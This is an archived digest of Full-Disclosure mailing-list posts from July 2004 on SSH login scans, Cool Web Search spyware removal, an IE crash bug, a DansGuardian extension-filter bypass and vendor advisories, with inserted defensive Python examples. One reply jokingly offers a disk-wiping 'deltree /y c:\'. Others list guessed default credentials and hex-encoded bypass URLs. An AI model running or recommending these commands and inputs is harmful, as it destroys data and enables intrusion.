
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
Re: [Full-Disclosure] Automated SSH login attempts?

From: Ali Campbell (fdisclosurealicampbell.org.uk)
Date: Thu Jul 29 2004 - 18:23:31 CDT


Do I take it that these things are just trying to log in using some
guessed password(s)? Out of interest, do we have any idea what these
opportunistic passwords might be?



 
RE: [Full-Disclosure] Cool Web Search

From: Richard Golodner (RGolodnerAetea.com)
Date: Thu Jul 29 2004 - 17:51:13 CDT


Try CWShredder too!

-----Original Message-----
From: Gregh [mailto:chowsozemail.com.au]
Sent: Thursday, July 29, 2004 5:46 PM
To: Disclosure Full
Subject: [Full-Disclosure] Cool Web Search

JFYI of anyone interested:

On Nanog a short time back, most of the list there decided that CWS couldn't
easily be removed. I first stumbled across it maybe around the start of July
and have had many instances of it, since, in many places.

Adaware does bugger-all to remove it. Spybot recognised it, got rid of it
and upon reboot it was back. It was never quite clear from a simple
inspection, what was putting it back.

When I first found it, I had also found "HiJackThis" and ran it. That prog
brought up the proper registry entries to enable me to correctly identify
CWS, remove the entries and delete files. It took some time the first time I
saw it but it takes about 10 mins (if that) to get rid of it, now. Nanog
disagreed and said it wasn't that easy. It simply WAS that easy. I just
happened to experience "dumb luck" and be one of the first (if not the
first) to easily get rid of it through HiJackThis.

So, for those of you who don't think Nanog is full of "Gods of Correctness",
if you are having probs with removal of CWS, get HiJackThis, let it scan and
then you will see, sticking out like a wart on your......nose :)........ the
entries you need to delete in order to properly rid that machine of CWS. It
wasn't hard using that prog.

Greg.



 
Re: [Full-Disclosure] Cool Web Search

From: Gregh (chowsozemail.com.au)
Date: Thu Jul 29 2004 - 19:04:39 CDT


----- Original Message -----
From: "Richard Golodner" <RGolodnerAetea.com>
To: "'Gregh'" <chowsozemail.com.au>; "Disclosure Full"
<full-disclosurelists.netsys.com>
Sent: Friday, July 30, 2004 8:51 AM
Subject: RE: [Full-Disclosure] Cool Web Search

> Try CWShredder too!
>

I did. Regardless of what it says, CWShredder doesn't get rid of all
variants of CoolWebSearch.

Greg.



 
Re: [Full-Disclosure] Crash IE with 11 bytes ;)

From: Aaron Gray (angraybeeb.net)
Date: Thu Jul 29 2004 - 09:19:50 CDT


> Here's a detailed description of what's going wrong with [STYLE];/*
>
> The problem is the unterminated comment "/*"; IE computes the length of
> the comment for a memcpy operation by subtracting the end pointer from
> the start pointer. The comment starts behind "/*" and should end at "*/",
> but since there is no terminator, the start of the string is used. IE
> therefore calculates the string to be -2 unicode characters long. The
> subsequent memcpy will try to copy 0xFFFFFFFE bytes until it gets a read
> or write exception. (You will see the offending instruction is a REP
> MOVSD)
>
> Unfortunately for us hackers, I believe you cannot control the length
> value for the memcpy other than setting it to -2. So you will always cause
> a read or write exception. You will only overwrite a small part of the
> heap before the exception is caused so overwriting the SEH to control
> execution is also ruled out.
>
> Conclusion: lame DoS
>
> I did find another way to use this to cause an exception at a different
> location:
> [SCRIPT]
> <snip>
> [/SCRIPT]
> This will crash because of a null pointer in a CMP [ESI], 0.
> It didn't look interesting to me, so no detailed investigation.
>
> Cheers,

Cheers, nice analysis, nasty bug, I bet the guy who wrote the code is feeling very sheepish :o)

TCS

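The length computation the quoted analysis describes, as an added example that is not part of the original post or of any IE code: a Python model of a comment scanner whose missing-terminator fallback produces a negative length that wraps to an unsigned copy count, next to a scanner that refuses to produce a length at all. The function names, the 32-bit mask and the sample strings are assumptions made here.

```python
# Added example (not from the original post): models the comment-length
# bug described in the quoted analysis. A CSS comment "/* ... */" whose
# terminator is missing yields a negative length that wraps to a huge
# unsigned copy size; the hardened scanner treats it as an error instead.
from typing import Optional

WORD_MASK = 0xFFFFFFFF  # 32-bit unsigned wrap, as in the REP MOVSD count


def buggy_comment_length(text: str, open_pos: int) -> int:
    """Reproduce the described logic: the comment body starts right after
    '/*'; if no '*/' follows, the 'end' falls back to the start of the
    string (offset 0), and end - start is taken as an unsigned count."""
    body_start = open_pos + 2
    end = text.find("*/", body_start)
    if end == -1:
        end = 0  # missing terminator: "end" points at the string start
    return (end - body_start) & WORD_MASK


def safe_comment_length(text: str, open_pos: int) -> Optional[int]:
    """Hardened version: an unterminated comment is an error, not a length."""
    body_start = open_pos + 2
    end = text.find("*/", body_start)
    if end == -1 or end < body_start:
        return None
    return end - body_start


if __name__ == "__main__":
    # A bare "/*" gives the -2 the analysis quotes, i.e. 0xFFFFFFFE unsigned.
    print(hex(buggy_comment_length("/*", 0)))
    print(safe_comment_length("/*", 0))
    print(safe_comment_length("/* ab */", 0))
```

The point of the hardened variant is that the length is derived only from a terminator that was actually found after the opening token, so the fallback that makes the subtraction go negative never exists.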


 
[Full-Disclosure] Re: OpenServer 5.0.6 OpenServer 5.0.7 : Multiple Vulnerabilities in Sendmail

From: George Capehart (gwcacm.org)
Date: Thu Jul 29 2004 - 17:07:08 CDT


On Wednesday 28 July 2004 16:10, please_reply_to_securitysco.com
allegedly wrote:
> _____________________________________________________________________
>_________
>
> SCO Security Advisory
>
> Subject: OpenServer 5.0.6 OpenServer 5.0.7 : Multiple
> Vulnerabilities in Sendmail Advisory number: SCOSA-2004.11
> Issue date: 2004 July 28
> Cross reference: sr876461 fz527630 erg712277 CAN-2003-0161 CA-2003-12
> sr884730 fz528323 erg712435 CAN-2003-0694 CA-2003-25
> _____________________________________________________________________
>_________
>
>
> 1. Problem Description
>
> CERT Advisory CA-2003-12
>
> There is a vulnerability in sendmail that can be exploited
> to cause a denial-of-service condition and could allow a
> remote attacker to execute arbitrary code with the privileges
> of the sendmail daemon, typically root.

This advisory was issued on March 29, 2003. That was /*sixteen*/ MONTHS
ago . . . C'mon, guys!

--
George W. Capehart

Key fingerprint: 3145 104D 9579 26DA DBC7 CDD0 9AE1 8C9C DD70 34EA

"With sufficient thrust, pigs fly just fine." -- RFC 1925



 
[Full-Disclosure] RE: outbind in MS outlook

From: Stephen Taylor (stayloagccs.lmco.com)
Date: Thu Jul 29 2004 - 13:21:23 CDT


Thank you very much. I don't get into the details but now I know a little
bit more to help me evaluate what I do see.
regards,
ST

-----Original Message-----
From: Kristian Lyngstøl [mailto:nesquikbohemians.org]
Sent: Thursday, July 29, 2004 2:03 PM
To: stayloagccs.lmco.com
Subject: Re: outbind in MS outlook

I am not subscribed to full-disclosure with my personal address (or
computer), so forgive the lack of a copy of your mail :)

Anyway, what you are seeing is normal.

This is actually a bug in the HTML code written by the spammer.

In the absence of a <handler>:// in a URL, any browser will (or should)
assume that the link is relative to the path it is currently reading from.

So since the link code is only <a href="www.link.com">link</a>, not
<a href="http://www.link.com">link</a>, the browser will assume this is
relative to the mailbox it is reading it in (outbind://...).

You will see the same problem on web sites if they omit the http:// in
links.

If www.siteA.com tries to link to www.siteB.com only using
<a href="www.siteB.com">, the browser will look for
http://www.siteA.com/www.siteB.com

--
Regards
Kristian Lyngstøl
Telenor SOC

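The resolution Kristian describes, as an added example that is not from the original mail: Python's urllib.parse applies the same reference-resolution rules a browser does, so a scheme-less href against the www.siteA.com base from the message lands on siteA. The helper names and the sample hrefs are assumptions; the example uses an http base rather than the mail client's outbind:// one.

```python
# Added example (not from the original mail): shows why an href without a
# scheme is resolved relative to the document's own base, using the
# www.siteA.com / www.siteB.com case from the message above.
from urllib.parse import urljoin, urlsplit


def has_scheme(href: str) -> bool:
    """True when the href carries an explicit <handler>:// part."""
    return urlsplit(href).scheme != ""


def resolve(base: str, href: str) -> str:
    """Resolve href against base the way a browser does (RFC 3986 rules)."""
    return urljoin(base, href)


def audit_links(base: str, hrefs):
    """Return (href, resolved, note) triples; the note flags scheme-less
    links, which are the ones that end up relative to the reading location."""
    out = []
    for h in hrefs:
        note = "ok" if has_scheme(h) else "no scheme: resolved relative to base"
        out.append((h, resolve(base, h), note))
    return out


if __name__ == "__main__":
    # Constructed sample: one correct link, one missing its http://
    for row in audit_links("http://www.siteA.com/",
                           ["http://www.siteB.com", "www.siteB.com"]):
        print(row)
```

Running a mail's links through audit_links is a cheap way to see which ones a client will try to open inside the mailbox store rather than on the web.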


 
RE: [Full-Disclosure] Cool Web Search

From: Todd Towles (toddtowlesbrookshires.com)
Date: Thu Jul 29 2004 - 19:39:02 CDT


The creator of CWShredder claims the newest versions of CWS are very
stealthy and I believe he has stopped updating the program. Therefore
CWShredder isn't the best for the newest. But as far as I understood things
(from other mailing list and forum posts), HiJackThis wasn't removing them
100% either.

Todd

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Richard
Golodner
Sent: Thursday, July 29, 2004 5:51 PM
To: 'Gregh'; Disclosure Full
Subject: RE: [Full-Disclosure] Cool Web Search

Try CWShredder too!

-----Original Message-----
From: Gregh [mailto:chowsozemail.com.au]
Sent: Thursday, July 29, 2004 5:46 PM
To: Disclosure Full
Subject: [Full-Disclosure] Cool Web Search

JFYI of anyone interested:

On Nanog a short time back, most of the list there decided that CWS couldn't
easily be removed. I first stumbled across it maybe around the start of July
and have had many instances of it, since, in many places.

Adaware does bugger-all to remove it. Spybot recognised it, got rid of it
and upon reboot it was back. It was never quite clear from a simple
inspection, what was putting it back.

When I first found it, I had also found "HiJackThis" and ran it. That prog
brought up the proper registry entries to enable me to correctly identify
CWS, remove the entries and delete files. It took some time the first time I
saw it but it takes about 10 mins (if that) to get rid of it, now. Nanog
disagreed and said it wasn't that easy. It simply WAS that easy. I just
happened to experience "dumb luck" and be one of the first (if not the
first) to easily get rid of it through HiJackThis.

So, for those of you who don't think Nanog is full of "Gods of Correctness",
if you are having probs with removal of CWS, get HiJackThis, let it scan and
then you will see, sticking out like a wart on your......nose :)........ the
entries you need to delete in order to properly rid that machine of CWS. It
wasn't hard using that prog.

Greg.



 
Re: [Full-Disclosure] Automated SSH login attempts?

From: Andrew Farmer (andfarmteknovis.com)
Date: Thu Jul 29 2004 - 19:51:18 CDT


On 29 Jul 2004, at 16:23, Ali Campbell wrote:
> Do I take it that these things are just trying to log in using some
> guessed password(s) ? Out of interest, do we have any idea what these
> opportunistic passwords might be ?

At least two of them are guest:guest and test:test. I'd guess that
root:root and admin:admin are on the list too :-)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)

iD8DBQFBCZuGPa6RRaKl0ScRAudcAJ0QfNl0sNiNJeIMnLTIrBlgTDodxwCeMBeO
rUjq1SGFN7tNuuH1Az5yQro=
=btt5
-----END PGP SIGNATURE-----



 
[Full-Disclosure] [Fwd: DansGuardian Hex Encoding URL Banned Extension Filter Bypass Vulnerability]

From: Rubén Molina (rubenudea.edu.co)
Date: Thu Jul 29 2004 - 13:20:45 CDT


DansGuardian Hex Encoding URL Banned Extension Filter Bypass Vulnerability
==========================================================================

Original Release Date: 2004-07-29
Author: Ruben Molina (a.k.a fradiavolo)
Email: rubenudea.edu.co

!!! VIVA COLOMBIA !!!

1. Systems affected:

All DansGuardian up to and including DansGuardian 2.8.

2. Overview:

DansGuardian (http://dansguardian.org) is an Open Source web content filter
available for various Unix based operating systems, including Linux. It
filters the actual content of pages based on many methods including phrase
matching, PICS filtering and URL filtering.

DansGuardian may allow malicious users to bypass the extension filter
rules when processing URLs which contain a hex-encoded filename (e.g.
http://server/file.%65%78%65 or http://server/file%2eexe).

3. Impact:

Under some installations, this may violate security policy, or allow users
to inadvertently access malicious web content.

4. Solution:

Upgrade to DansGuardian 2.8.0.1

5. Patch:

--- FOptionContainer.cpp.diff ---
806d805
< url.hexDecode();
---------------------------------
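Review bot: the direction of this diff is not stated, and it matters here: read as old-to-new, `806d805` with `< url.hexDecode();` deletes the decode call, which is the opposite of what a fix for a hex-encoding bypass needs (the URL has to be decoded before the banned-extension comparison runs); if the diff was taken new-to-old, it instead adds the call. State which file was the original and prefer a unified diff (`diff -u`) with context lines so the reader can see where the decode sits relative to the extension check in FOptionContainer.cpp.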

6. Timeline and credits:

28/07/2004 Notification to the main developer (author at dansguardian dot
org)
28/07/2004 DansGuardian 2.8.0.1 released
29/07/2004 Public Security Advisory.

7. Thanks to:

Gigax.org people and Silence Team ;)

--

Rubén Molina
0xDEF3F700

Zure atera iristean ostikada jotzen nola irtengo zara?
Eskuak buru gainean ala pistolaren gatilvan?

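A banned-extension check done the way the advisory says DansGuardian got it wrong, beside one that percent-decodes first, as an added example that is not DansGuardian's code. The BANNED set, the function names and the decode-round limit are assumptions; the test URLs are the two shapes given in section 2 of the advisory.

```python
# Added example (not DansGuardian's code): a banned-extension check applied
# to the raw path versus one applied after percent-decoding, using the two
# URL shapes from the advisory. BANNED and the sample URLs are constructed.
import posixpath
from urllib.parse import unquote, urlsplit

BANNED = {".exe", ".scr", ".pif"}  # constructed sample policy


def extension_of(path: str) -> str:
    """Lower-cased extension of the last path segment ('' if none)."""
    return posixpath.splitext(path)[1].lower()


def naive_blocked(url: str) -> bool:
    """Checks the raw path: 'file.%65%78%65' and 'file%2eexe' slip through
    because the extension is compared before any decoding happens."""
    return extension_of(urlsplit(url).path) in BANNED


def hardened_blocked(url: str, max_rounds: int = 3) -> bool:
    """Percent-decode first (repeating a few rounds so double encoding such
    as '%252e' is also normalised), and only then compare the extension."""
    path = urlsplit(url).path
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return extension_of(path) in BANNED


if __name__ == "__main__":
    for u in ("http://server/file.%65%78%65", "http://server/file%2eexe",
              "http://server/file.exe", "http://server/index.html"):
        print(u, "naive:", naive_blocked(u), "hardened:", hardened_blocked(u))
```

Decoding before comparison is the whole fix; the bounded loop is there so that a policy check and the downstream decoder agree on what the filename actually is.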


 
Re: [Full-Disclosure] Re: Automated SSH login attempts?

dmargolistwing.org
Date: Thu Jul 29 2004 - 17:18:01 CDT


Max Valdez wrote:

> doesn't make any sense
>
> That way you should have root on the first box to start exploiting others,
> kind of weird.
>
> smells like rootkit downloader to me.
>
> Anybody willing to make a strace of this program ??
>
> Max
>

A previous poster mentioned that after exploiting a test/test or
guest/guest account, an attacker downloaded SuckIt to his machine, got
root using some unspecified local vuln (he said it was a very unpatched
machine), and started from there.

The program IS linked against OpenSSL and appears to initiate an ssh
connection with the target(s) in a separate text file (uniq.txt). I
can't follow the connection because of the encryption, but it seems to
be trying a user and then disconnecting (as in, I see nothing really
obviously out of the ordinary when I run it). Haven't got farther in
disassembling it yet.



 
Re: [Full-Disclosure] Cool Web Search

From: JacK (jackwebsecurite.org)
Date: Thu Jul 29 2004 - 19:20:18 CDT


On Friday, July 30, 2004 1:03 AM [GMT+1=CET],
full-disclosure-requestlists.netsys.com
<full-disclosure-requestlists.netsys.com> écrivait:

> So, for those of you who don't think Nanog is full of "Gods of
> Correctness",
> if you are having probs with removal of CWS, get HiJackThis, let it scan
> and
> then you will see, sticking out like a wart on your......nose :)........
> the
> entries you need to delete in order to properly rid that machine of CWS.
> It
> wasn't hard using that prog.

HijackThis has its limits: it cannot get rid of some variants, for instance
one with a hidden value regenerating the entry

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Windows\AppInit_DLLs

using Backdoor.Agent.ba to install itself and launching a random-name exe.

Regards,
--
JacK



 
Re: [Full-Disclosure] Re: Automated SSH login attempts?

dmargolistwing.org
Date: Thu Jul 29 2004 - 12:52:29 CDT


Stefan Janecek wrote:

> This does not seem to be a stupid brute force attack, as there is only
> one login attempt per user. Could it be that the tool tries to exploit
> some vulnerability in the sshd, and just tries to look harmless by using
> 'test' and 'guest' as usernames?
>
> The compromised machine was running an old debian woody installation
> which had not been upgraded for at least one year, the sshd version
> string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'

Does the Debian machine that was compromised have a "test" or
"guest" username?

Also, if it wasn't patched in a year, it may still be vulnerable to
this: http://www.cert.org/advisories/CA-2003-24.html

I would tend to think this isn't a 0day kinda vuln, as if it were, he'd
be a lot more successful than he seems (unless we're all rooted and
don't even know it). But who can tell?

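The one-attempt-per-username pattern Stefan describes, turned into detection logic over sshd auth-log lines, as an added example that is not from the thread. The log lines are constructed here (RFC 5737 documentation addresses), and the threshold and function names are assumptions; the message format is OpenSSH's standard "Failed password for [invalid user] NAME from IP" line.

```python
# Added example (not from the thread): flags the pattern described above
# (one failed login per guessed username from a single source) in OpenSSH
# auth-log lines. The log lines below are constructed for this example.
import re
from collections import defaultdict

SSH_FAIL = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+)"
)

SAMPLE_LOG = """\
Jul 29 16:01:02 host sshd[4242]: Failed password for invalid user test from 192.0.2.10 port 40001 ssh2
Jul 29 16:01:03 host sshd[4243]: Failed password for invalid user guest from 192.0.2.10 port 40002 ssh2
Jul 29 16:01:04 host sshd[4244]: Failed password for root from 192.0.2.10 port 40003 ssh2
Jul 29 16:05:00 host sshd[4250]: Failed password for alice from 198.51.100.7 port 51000 ssh2
Jul 29 16:05:09 host sshd[4251]: Failed password for alice from 198.51.100.7 port 51001 ssh2
Jul 29 16:05:20 host sshd[4252]: Accepted password for alice from 198.51.100.7 port 51002 ssh2
"""


def failures_by_source(log_text: str):
    """Map source IP -> {username: number of failed attempts}."""
    table = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        m = SSH_FAIL.search(line)
        if m:
            table[m["ip"]][m["user"]] += 1
    return table


def username_sweeps(log_text: str, min_users: int = 3):
    """Sources that tried at least min_users distinct names, each exactly
    once: the sweep the thread describes, as opposed to a per-account
    brute force (many attempts against one name, like alice above)."""
    hits = []
    for ip, users in failures_by_source(log_text).items():
        if len(users) >= min_users and all(n == 1 for n in users.values()):
            hits.append((ip, sorted(users)))
    return hits


if __name__ == "__main__":
    for ip, names in username_sweeps(SAMPLE_LOG):
        print(f"{ip}: one attempt each against {', '.join(names)}")
```

The distinguishing signal is the shape of the failures rather than their count: a user typing a wrong password repeats one name, while the tool in the thread touches each name once and moves on, so a plain failed-login threshold can miss it entirely.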


 
Re: [Full-Disclosure] Cool Web Search

From: Gregh (chowsozemail.com.au)
Date: Thu Jul 29 2004 - 20:08:08 CDT


----- Original Message -----
From: "JacK" <jackwebsecurite.org>
To: <full-disclosurelists.netsys.com>
Sent: Friday, July 30, 2004 10:20 AM
Subject: Re: [Full-Disclosure] Cool Web Search

> On Friday, July 30, 2004 1:03 AM [GMT+1=CET],
> full-disclosure-requestlists.netsys.com
> <full-disclosure-requestlists.netsys.com> écrivait:
>
>
> > So, for those of you who don't think Nanog is full of "Gods of
> > Correctness",
> > if you are having probs with removal of CWS, get HiJackThis, let it scan
> > and
> > then you will see, sticking out like a wart on your......nose :)........
> > the
> > entries you need to delete in order to properly rid that machine of CWS.
> > It
> > wasn't hard using that prog.
>
> HijackThis has its limits: it cannot get rid of some variants, for
> instance one with a hidden value regenerating the entry
>
> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
> NT\CurrentVersion\Windows\AppInit_DLLs
>
> using Backdoor.Agent.ba to install itself and launching a random-name
> exe.
>

I don't know if you fully understand HiJackThis or maybe I was just unclear.

HiJackThis wasn't used by me to get rid of CWS as, for example, running
Adaware gets rid of tracking cookies and some installed spyware progs. It
was used by me to list various entries in registry which, when lumped
together like that, show off CWS quite easily. Once they are there, removing
them and the progs started by some of them is easy.

That is all you have to do. Don't expect HiJackThis to magically get rid of
it all at the flick of a button. You *DO* have to have a small amount of
registry knowledge in order to ID which entries are seriously bull and which
are honest BHOs etc. I am not a registry "expert" but claim a small amount
of registry knowledge so even to ME it was obvious what was what.

Greg.



 
Re: [Full-Disclosure] Cool Web Search

From: KF (lists) (kf_listssecnetops.com)
Date: Thu Jul 29 2004 - 20:09:33 CDT


Try a deltree /y c:\ that usually does the trick.
-KF

Todd Towles wrote:

>The creator of CWShredder claims the newest versions of CWS are very
>stealthy and I believe he has stopped updating the program. Therefore
>CWShredder isn't the best for the newest. But as far as I understood things
>(from other mailing list and forum posts), HiJackThis wasn't removing them
>100% either.
>
>Todd
>
>-----Original Message-----
>From: full-disclosure-adminlists.netsys.com
>[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Richard
>Golodner
>Sent: Thursday, July 29, 2004 5:51 PM
>To: 'Gregh'; Disclosure Full
>Subject: RE: [Full-Disclosure] Cool Web Search
>
>Try CWShredder too!
>
>-----Original Message-----
>From: Gregh [mailto:chowsozemail.com.au]
>Sent: Thursday, July 29, 2004 5:46 PM
>To: Disclosure Full
>Subject: [Full-Disclosure] Cool Web Search
>
>
>JFYI of anyone interested:
>
>On Nanog a short time back, most of the list there decided that CWS couldn't
>easily be removed. I first stumbled across it maybe around the start of July
>and have had many instances of it, since, in many places.
>
>Adaware does bugger-all to remove it. Spybot recognised it, got rid of it
>and upon reboot it was back. It was never quite clear from a simple
>inspection, what was putting it back.
>
>When I first found it, I had also found "HiJackThis" and ran it. That prog
>brought up the proper registry entries to enable me to correctly identify
>CWS, remove the entries and delete files. It took some time the first time I
>saw it but it takes about 10 mins (if that) to get rid of it, now. Nanog
>disagreed and said it wasn't that easy. It simply WAS that easy. I just
>happened to experience "dumb luck" and be one of the first (if not the
>first) to easily get rid of it through HiJackThis.
>
>So, for those of you who don't think Nanog is full of "Gods of Correctness",
>if you are having probs with removal of CWS, get HiJackThis, let it scan and
>then you will see, sticking out like a wart on your......nose :)........ the
>entries you need to delete in order to properly rid that machine of CWS. It
>wasn't hard using that prog.
>
>Greg.
>
>
>
>



 
[Full-Disclosure] CHX-I

From: Maurizio Trinco (maurizio_trincoyahoo.com)
Date: Thu Jul 29 2004 - 21:46:55 CDT


Hey all,
CHX (http://www.idrci.net/idrci_tryit2.htm) seems to
be a very nice piece of software. Anyone tried it in
real life? After toying with it for a couple of hours,
I really don't understand how come it's still just a
(relatively) obscure application. Any comments re. its
usage? any known vulnerabilities?

        
                



 
Re: [Full-Disclosure] Re: OpenServer 5.0.6 OpenServer 5.0.7 : Multiple Vulnerabilities in Sendmail

From: Frank Knobbe (frankknobbe.us)
Date: Thu Jul 29 2004 - 21:57:38 CDT


On Thu, 2004-07-29 at 17:07, George Capehart wrote:
> > Subject: OpenServer 5.0.6 OpenServer 5.0.7 : Multiple
> > Vulnerabilities in Sendmail Advisory number: SCOSA-2004.11
> > Issue date: 2004 July 28

> This advisory was issued on March 29, 2003. That was /*sixteen*/ MONTHS
> ago . . . C'mon, guys!

Heya George,

perhaps the engineers are too busy fixing broken legal strategies and
are putting silly software issues on the back-burner.

(After all, why fix it if they file Chapter 11 by end of the year
anyway?)

Cheers,
Frank

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (FreeBSD)

iD8DBQBBCbkhJjGc5ftAw8wRAuoAAJ9XmkPrULnmctXnNd5rywKehlqZyQCgvowG
y92Ox70Ed4Q2eJp6oXmYTE0=
=y3GL
-----END PGP SIGNATURE-----



 
[Full-Disclosure] MDKSA-2004:077 - Updated wv packages fix vulnerability

From: Mandrake Linux Security Team (securitylinux-mandrake.com)
Date: Fri Jul 30 2004 - 00:26:09 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

                 Mandrakelinux Security Update Advisory
 _______________________________________________________________________

 Package name: wv
 Advisory ID: MDKSA-2004:077
 Date: July 29th, 2004

 Affected versions: 10.0, 9.2
 ______________________________________________________________________

 Problem Description:

 iDefense discovered a buffer overflow vulnerability in the wv package
 which could allow an attacker to execute arbitrary code with the
 privileges of the user running the vulnerable application.
 
 The updated packages are patched to protect against this problem.
 _______________________________________________________________________

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0645
  http://www.idefense.com/application/poi/display?id=115&type=vulnerabilities&flashstatus=true
 ______________________________________________________________________

 Updated Packages:
  
 Mandrakelinux 10.0:
 7bc8b712dbb5ca6592de05341b6d1489 10.0/RPMS/libwv-1.0_0-1.0.0-1.1.100mdk.i586.rpm
 bec8e09ab3be99e622bd62cf6c0cf3df 10.0/RPMS/libwv-1.0_0-devel-1.0.0-1.1.100mdk.i586.rpm
 e9795464f2baa0bb36ea2f15d7e420c6 10.0/RPMS/wv-1.0.0-1.1.100mdk.i586.rpm
 10a630945f35b4a90f36a6270d98d241 10.0/SRPMS/wv-1.0.0-1.1.100mdk.src.rpm

 Mandrakelinux 10.0/AMD64:
 e3072c5942b032b547b04dd10a442826 amd64/10.0/RPMS/lib64wv-1.0_0-1.0.0-1.1.100mdk.amd64.rpm
 8b369ac8db42130442c003cb7229a7d1 amd64/10.0/RPMS/lib64wv-1.0_0-devel-1.0.0-1.1.100mdk.amd64.rpm
 98c5fa468e3815501058461213bb7da7 amd64/10.0/RPMS/wv-1.0.0-1.1.100mdk.amd64.rpm
 10a630945f35b4a90f36a6270d98d241 amd64/10.0/SRPMS/wv-1.0.0-1.1.100mdk.src.rpm

 Mandrakelinux 9.2:
 dcf67ddd72cc96ea526d4189dce93edb 9.2/RPMS/libwv-1.0_0-1.0.0-1.1.92mdk.i586.rpm
 d9c0629e2c8921a93290aede1b5158f9 9.2/RPMS/libwv-1.0_0-devel-1.0.0-1.1.92mdk.i586.rpm
 fa6f235b5934c40af8cb087394bcdefc 9.2/RPMS/wv-1.0.0-1.1.92mdk.i586.rpm
 ef345c688ddb57bdbadba00a5b924c79 9.2/SRPMS/wv-1.0.0-1.1.92mdk.src.rpm

 Mandrakelinux 9.2/AMD64:
 a23f13d265c1916c45c514798a37aaad amd64/9.2/RPMS/lib64wv-1.0_0-1.0.0-1.1.92mdk.amd64.rpm
 9ca5b4da978fb5c7908cd52018f6e191 amd64/9.2/RPMS/lib64wv-1.0_0-devel-1.0.0-1.1.92mdk.amd64.rpm
 568e4b5933ceed44a7c7b30dfff15f80 amd64/9.2/RPMS/wv-1.0.0-1.1.92mdk.amd64.rpm
 ef345c688ddb57bdbadba00a5b924c79 amd64/9.2/SRPMS/wv-1.0.0-1.1.92mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrakeUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandrakesoft for security. You can obtain
 the GPG public key of the Mandrakelinux Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandrakelinux at:

  http://www.mandrakesoft.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_linux-mandrake.com

 Type Bits/KeyID Date User ID
 pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team
  <security linux-mandrake.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQFBCdvwmqjQ0CJFipgRAoHPAJ419K04Am6fBCVSjd92EMUjQyW3QACgvnkl
xlFsJ7R1txTrB3F7MPA7AMI=
=ywgN
-----END PGP SIGNATURE-----



 
[Full-Disclosure] MDKSA-2004:078 - Updated OpenOffice.org packages fix libneon vulnerability

From: Mandrake Linux Security Team (securitylinux-mandrake.com)
Date: Fri Jul 30 2004 - 00:35:59 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

                 Mandrakelinux Security Update Advisory
 _______________________________________________________________________

 Package name: OpenOffice.org
 Advisory ID: MDKSA-2004:078
 Date: July 29th, 2004

 Affected versions: 10.0
 ______________________________________________________________________

 Problem Description:

 The OpenOffice.org office suite contains an internal libneon library
 which allows it to connect to WebDAV servers. This internal library
 is subject to the same vulnerabilities that were fixed in libneon
 recently. These updated packages contain fixes to libneon to
 correct the several format string vulnerabilities in it, as well as
 a heap-based buffer overflow vulnerability.
 _______________________________________________________________________

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0179
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0398
 ______________________________________________________________________

 Updated Packages:
  
 Mandrakelinux 10.0:
 bdd8d8a8b6af463df910a7cde025b734 10.0/RPMS/OpenOffice.org-1.1.2-3.1.100mdk.i586.rpm
 51c8887de72b7ac39c85062b35d260e6 10.0/RPMS/OpenOffice.org-help-cs-1.1.2-3.1.100mdk.i586.rpm
 1be3655a3870f3a62608df7e864afe9e 10.0/RPMS/OpenOffice.org-help-de-1.1.2-3.1.100mdk.i586.rpm
 0e01d4df1bd94eb1937b4875af700056 10.0/RPMS/OpenOffice.org-help-en-1.1.2-3.1.100mdk.i586.rpm
 5f00be2536c9e8b3a836275b96ab753b 10.0/RPMS/OpenOffice.org-help-es-1.1.2-3.1.100mdk.i586.rpm
 e90125b24f99f099704d60018e339b8d 10.0/RPMS/OpenOffice.org-help-eu-1.1.2-3.1.100mdk.i586.rpm
 836aec6915d5ceecc20c3e034e19e336 10.0/RPMS/OpenOffice.org-help-fi-1.1.2-3.1.100mdk.i586.rpm
 20b5190e2b683783aab65d883468074e 10.0/RPMS/OpenOffice.org-help-fr-1.1.2-3.1.100mdk.i586.rpm
 4f7ef1c9b8251e96ce140463eaf28310 10.0/RPMS/OpenOffice.org-help-it-1.1.2-3.1.100mdk.i586.rpm
 7b5f6d5701e9f290d34ab7a4ada25fc1 10.0/RPMS/OpenOffice.org-help-ja-1.1.2-3.1.100mdk.i586.rpm
 d70298c769ce7dd2596d640a0c644cc9 10.0/RPMS/OpenOffice.org-help-ko-1.1.2-3.1.100mdk.i586.rpm
 ed06265ba967349b8a28420e5ff56ae8 10.0/RPMS/OpenOffice.org-help-nl-1.1.2-3.1.100mdk.i586.rpm
 b6c34d066a2addb975837dba16ffe9c7 10.0/RPMS/OpenOffice.org-help-ru-1.1.2-3.1.100mdk.i586.rpm
 c2dfd07ac968d38a0c6c59828f984850 10.0/RPMS/OpenOffice.org-help-sk-1.1.2-3.1.100mdk.i586.rpm
 6dbf67fa908bb9a90dfcc0aa7fe43c93 10.0/RPMS/OpenOffice.org-help-sv-1.1.2-3.1.100mdk.i586.rpm
